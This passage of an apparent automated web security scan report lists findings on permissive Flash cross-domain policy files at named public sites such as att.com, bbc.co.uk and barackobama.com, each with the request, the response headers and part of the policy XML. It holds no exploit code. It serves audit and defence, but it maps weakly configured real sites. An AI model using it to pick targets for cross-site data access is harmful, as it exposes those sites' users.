P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 25 Mar 2011 15:20:15 GMT
Accept-Ranges: bytes
Content-Length: 799
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.associatedcontent.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.acdn.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adinterax.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.joystickinteractive.com" secure="false"/>
...[SNIP]...
7.173. http://www.astrology.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.astrology.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.astrology.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/xml
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Cache-Control: max-age=3562
Expires: Sat, 02 Apr 2011 14:45:07 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Content-Length: 305
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...
7.174. http://www.att.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 05 Oct 2010 20:19:38 GMT
ETag: "19b-491e4614f4a80"
Accept-Ranges: bytes
Content-Length: 411
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:47 GMT
Connection: close
Set-Cookie: TLTHID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com
Set-Cookie: TLTSID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com
Set-Cookie: TLTUID=03E218A65D26105D384BAB5B5D53C6B4; Path=/; Domain=.att.com; Expires=Sat, 02-04-2021 12:37:47 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.att.com"/>
   <allow-access-from domain="*.cingular.com"/>
   <allow-access-from domain="*.cingular.net"/>
   <allow-access-from domain="seattle.razorfishtc.com"/>
...[SNIP]...
7.175. http://www.azcentral.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.azcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.azcentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:13 GMT
Server: Apache
Last-Modified: Mon, 05 Oct 2009 16:44:19 GMT
Accept-Ranges: bytes
Content-Length: 289
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.azcentral.com"/>
...[SNIP]...
7.176. http://www.babiesrus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.babiesrus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babiesrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:39 GMT
Server: Apache/2.0.63 (Unix)
Vary: Host,Accept-Encoding
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "540db5-39b-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 923
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:27:39 GMT
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.toysrus.com" />
<allow-access-from domain="www.babiesrus.com" />
<allow-access-from domain="trus.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.201" />
<allow-access-from domain="206.16.220.201" />
<allow-access-from domain="172.20.1.201" />
<allow-access-from domain="172.21.1.201" />
<allow-access-from domain="vqascweb1.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vqascweb2.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="toysrus.shoplocal.com" secure="true" />
...[SNIP]...
<allow-access-from domain="beta.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...
7.177. http://www.babycenter.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.babycenter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babycenter.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"225-1300928296000"
Last-Modified: Thu, 24 Mar 2011 00:58:16 GMT
Content-Length: 225
Content-Type: text/xml
Cache-Control: private, no-cache, must-revalidate, proxy-revalidate
Expires: Sat, 02 Apr 2011 13:25:44 GMT
Date: Sat, 02 Apr 2011 13:25:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.babycenter.com" secure="false" />
...[SNIP]...
7.178. http://www.barackobama.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barackobama.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barackobama.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 364
Content-Type: text/xml
ETag: "124389-16c-461ae1cf71040"
Expires: Sat, 02 Apr 2011 14:41:57 GMT
Last-Modified: Fri, 30 Jan 2009 07:25:45 GMT
Accept-Ranges: bytes
Server: Apache
Date: Sat, 02 Apr 2011 13:41:57 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="barackobama.com" />    <allow-access-from domain="*.barackobama.com" />    <allow-access-from domain="oadmin.pacew.com" />    <allow-access-from domain="obama.3cdn.net" />
...[SNIP]...
7.179. http://www.barbie.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barbie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barbie.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:54:36 GMT
Server: MII-WSD/1.4
Content-Type: text/xml
Last-Modified: Tue, 24 Jun 2008 17:49:48 GMT
Accept-Ranges: bytes
ETag: "467218b222d6c81:3f6"
X-Powered-By: ASP.NET
Age: 3090
Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Sat, 02 Apr 2011 15:54:36 GMT
Cache-Control: max-age=10800
Via: 1.0 mdw107008 (MII-APC/1.6)
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.everythinggirl.com" />
<allow-access-from domain="*.mattel.net" />
<allow-access-from domain="stageeverythinggirl.mattel.net" />
<allow-access-from domain="*.eshq.mattel.com" />
<allow-access-from domain="*.corp.mattel.com" />
<allow-access-from domain="www.everythinggirl.com" />
...[SNIP]...
7.180. http://www.barnesandnoble.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barnesandnoble.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barnesandnoble.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 128
Content-Type: text/xml
Last-Modified: Tue, 11 Sep 2007 16:08:18 GMT
Accept-Ranges: bytes
ETag: "054ef78df4c71:479"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:14 GMT
Connection: close
Set-Cookie: datacenter=nj;path=/;domain=barnesandnoble.com;

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.barnesandnoble.com" />
</cross-domain-policy>
7.181. http://www.bathandbodyworks.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bathandbodyworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bathandbodyworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:44 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Mar 2011 09:16:11 GMT
ETag: "a7d5b4-2fc-49d7c5d242cc0"
Accept-Ranges: bytes
Content-Length: 764
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:05:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.bbw.com" />
<allow-access-from domain="bbw.com" />
...[SNIP]...
<allow-access-from domain="reviews.bathandbodyworks.com" />
<allow-access-from domain="bathandbodyworks.com" />
<allow-access-from domain="bbw.imageg.net" />
<allow-access-from domain="bbw.cat.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="bbw.sec.imageg.net" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...
7.182. http://www.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml
Date: Sat, 02 Apr 2011 12:43:24 GMT
Keep-Alive: timeout=4, max=200
Accept-Ranges: bytes
Connection: close
Last-Modified: Thu, 13 May 2010 10:26:51 GMT
Content-Length: 1216

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="news.bbc.co.uk" />
<allow-access-from domain="newsimg.bbc.co.uk"/>
<allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
<allow-access-from domain="newsrss.bbc.co.uk" />
<allow-access-from domain="newsapi.bbc.co.uk" />
<allow-access-from domain="extdev.bbc.co.uk" />
<allow-access-from domain="stats.bbc.co.uk" />
<allow-access-from domain="*.bbc.co.uk" />
<allow-access-from domain="*.bbc.net.uk" />
<allow-access-from domain="*.bbc.com" />
<allow-access-from domain="*.bbcamerica.com" />
<allow-access-from domain="www.bbcamerica.com" />
<allow-access-from domain="*.bbcimg.co.uk" />
<allow-access-from domain="node1.bbcimg.co.uk" />
<allow-access-from domain="node2.bbcimg.co.uk" />
<allow-access-from domain="node3.bbcimg.co.uk" />
<allow-access-from domain="node4.bbcimg.co.uk" />
<allow-access-from domain="news.bbcimg.co.uk" />
...[SNIP]...
7.183. http://www.bettycrocker.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bettycrocker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bettycrocker.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Last-Modified: Wed, 09 Mar 2011 11:40:50 GMT
Accept-Ranges: bytes
ETag: "6cc41ad74edecb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 226
Date: Sat, 02 Apr 2011 13:45:49 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bettycrocker.com" />
...[SNIP]...
7.184. http://www.blastro.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blastro.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:24 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...
7.185. http://www.blogtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogtv.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/xml
Last-Modified: Sun, 06 Jun 2010 16:19:14 GMT
Accept-Ranges: bytes
ETag: "879c561945cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.blogtv.com" />
...[SNIP]...
7.186. http://www.bluemountain.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluemountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 18:05:29 GMT
ETag: "12590bc-1d4-70484c40"
Accept-Ranges: bytes
Content-Length: 468
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.beta.americangreetings.com" />
<allow-access-from domain="*.americangreetings.com" />
<allow-access-from domain="*.bluemountain.com" />
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...
7.187. http://www.bnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...
7.188. http://www.bodybuilding.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bodybuilding.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bodybuilding.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 17 Jan 2007 17:03:00 GMT
ETag: "eac1f2-11d-4273f73703900"-gzip
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:38:17 GMT
Content-Length: 285
Connection: close

<?xml version="1.0"?>
<!-- http://www.bodybuilding.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.bodybuilders.com" />
<allow-access-from domain="*.bodybuilding.com" />
<allow-access-from domain="*.teenbodybuilding.com" />
...[SNIP]...
7.189. http://www.britannica.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.britannica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.britannica.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_jk/1.2.31
Last-Modified: Mon, 23 Aug 2010 21:50:25 GMT
ETag: "a682f3-469-48e84a2ccca40"
Accept-Ranges: bytes
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
MyHeader: web101-b
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.britannica.com"/>
<allow-access-from domain="*.eb.com"/>
<allow-access-from domain="*.eb.com.au"/>
<allow-access-from domain="*.eb.co.uk"/>
<allow-access-from domain="*.ebonline.com"/>
<allow-access-from domain="*.ebonline.co.nz"/>
...[SNIP]...
<allow-access-from domain="redir.adap.tv"/>
...[SNIP]...
7.190. http://www.businessweek.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.businessweek.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.31
benv: nybweb02
bvh: www.businessweek.com
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:41 GMT
Content-Length: 243
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.businessweek.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.businessweek.com" />
<allow-access-from domain="*.mcgraw-hill.com" />
...[SNIP]...
7.191. http://www.buy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.buy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buy.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 01 Feb 2010 23:12:53 GMT
Accept-Ranges: bytes
ETag: "28ddf51494a3ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 917
Date: Sat, 02 Apr 2011 13:37:44 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="intel.mrmworldwide.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ak.buy.com" />
<allow-access-from domain="rss.buy.com" />
<allow-access-from domain="*.llnwd.net" />
<allow-access-from domain="*.buyservices.com" />
...[SNIP]...
7.192. http://www.cabelas.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cabelas.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cabelas.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 28 Mar 2011 21:28:32 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:32:03 GMT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!-- http://www.cabelas.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cabelas.com" />
...[SNIP]...
7.193. http://www.canada.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.canada.com
